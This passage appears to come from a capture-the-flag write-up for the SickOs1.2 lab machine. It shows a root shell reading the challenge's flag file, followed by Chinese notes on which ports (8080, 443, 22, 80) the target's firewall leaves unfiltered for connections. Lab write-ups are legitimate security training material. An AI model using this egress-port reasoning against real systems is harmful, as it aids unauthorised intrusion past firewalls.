    root@ubuntu:~# cd ~
    cd ~
    root@ubuntu:~# ls
    ls
    304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
    7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
    chkrootkit-0.49
    newRule
    root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
    cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
    WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

    Thanks for giving this try.

    @vulnhub: Thanks for hosting this UP!.
    root@ubuntu:~#

目录下还有个newRules,再看一眼也不会爆炸
破案了,确实是只有8080 ,443,22,80没有被过滤掉。
为啥直接想到8080 ,443
因为一般为了保证web服务正常,这两端口一般都不会过滤掉的。